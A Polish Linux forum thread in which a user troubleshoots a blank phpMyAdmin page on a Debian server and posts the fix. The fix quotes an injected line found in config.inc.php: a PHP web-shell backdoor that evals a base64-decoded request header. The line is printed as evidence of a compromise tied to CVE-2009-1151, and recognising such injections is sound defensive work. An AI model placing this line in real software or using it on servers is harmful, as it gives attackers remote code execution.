Nie jesteś zalogowany.
Jeśli nie posiadasz konta, zarejestruj je już teraz! Pozwoli Ci ono w pełni korzystać z naszego serwisu. Spamerom dziękujemy!

Ogłoszenie

Prosimy o pomoc dla małej Julki — przekaż 1% podatku na Fundacji Dzieciom zdazyć z Pomocą.
Więcej informacji na dug.net.pl/pomagamy/.

#1  2013-10-07 11:03:45

styko - Użytkownik

styko
Użytkownik

Pusta strona w phpmyadmin

Witam. Przepraszam, że pewnie z trywialnym problemem udzielam się tutaj, jednakże sprawa jest dla mnie dziwna i nie bardzo mogę sobie poradzić z tym. Dodatkowo google nie dał rady mi pomóc gdyż wszystkie rozwiązania do problemów podobnych do mojego nie działały.

Mianowicie mój problem dotyczy phpmyadmin (poprawnie zainstalowany serwer LAMP na Debianie, działał 2 lata bez problemów).

Za pomocą phpmyadmin zarządzam kontami pocztowymi na serwerze. Do niedawna wszystko było w porządku, jeszcze miesiąc temu dodawałem ostatnią skrzynkę. Po miesiącu nielogowania się do phpmyadmin (nikt inny nie ma dostępu do serwera), dzisiaj chciałem popracować nad kontami użytkowników jednakże po wpisaniu dotychczasowego adresu

xxx.pl/phpmyadmin

wyświetla się pusta,biała strona (bez żadnego komunikatu). To samo bezpośrednio na serwerze wpisując adres/phpmyadmin localhost/phpmyadmin czy też ip/phpmyadmin.

Mam komunikat w niektórych przeglądarkach, "stronę załadowano" jednakże strona jest po prostu biała (jednak favicon przy adresie zmienia się na taki jak jest ustawiony dla strony www).

W logach apache nie ma praktycznie info o phpmyadmin, oprócz jednego (chociaż nie sądzę, że to to gdyż komunikat jest z przed godziny, a logować się chciałem przed momentem)

Symbolic link not allowed or link target not accessible /var/www/public_html/phpmyadmin

Uprawnienia w usr/share/phpmyadmin i w podlinkowaniu zmienione są na 777 (pełny i nie zalecany dostęp jednakże na próbę czy to może to blokuje).

Jest ktoś w stanie podpoiwedzieć gdzie szukać rozwiązania??

P.S
reinstal phpmyadmin i restart Apache2 nie pomagają.

P.S2

Od ostatniego poprawnego logowania do phpmyadmin nic nie było na serwerze robione, po prostu samo z siebie przestało działać.

Wdzięczny byłbym niezmiernie za pomoc w nakierowaniu mnie na ścieżkę prowadzącą do rozwiązania problemu.

Pozdrawiam

***************************************************************************************************************
Rozwiązane. Przepraszam za zawracanie dupy, ale po długich poszukiwaniach udało mi się trafić na rozwiązanie.
Zastosowałem się do poniższej rady

I had this problem show up a week ago as well. I tracked it down to my /var/lib/phpmyadmin/config.inc.php file be corrupted. I had the following line in it:

$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy'

Which, when I commented out, phpmyadmin was up and running again.
Found a couple articles about the config.inc.php file being vulnerable.. so maybe it's being hacked
http://www.gnucitizen.org/blog/cve-2009-1151-phpmya … f-of-concept/

The phpmyadmin > 2.11.9.5 seems to fix this security hole, but the Ubuntu phpmyadmin seems to be 2.11.8.1, so you'll probably have to do a manual patch/install..

Z tym, że wywaliłem całkowicie config.inc.php i phpmyadmin poszedł normalnie bez problemu.

Pozdrawiam, może komuś się to przyda

Ostatnio edytowany przez styko (2013-10-07 11:47:09)

Stopka forum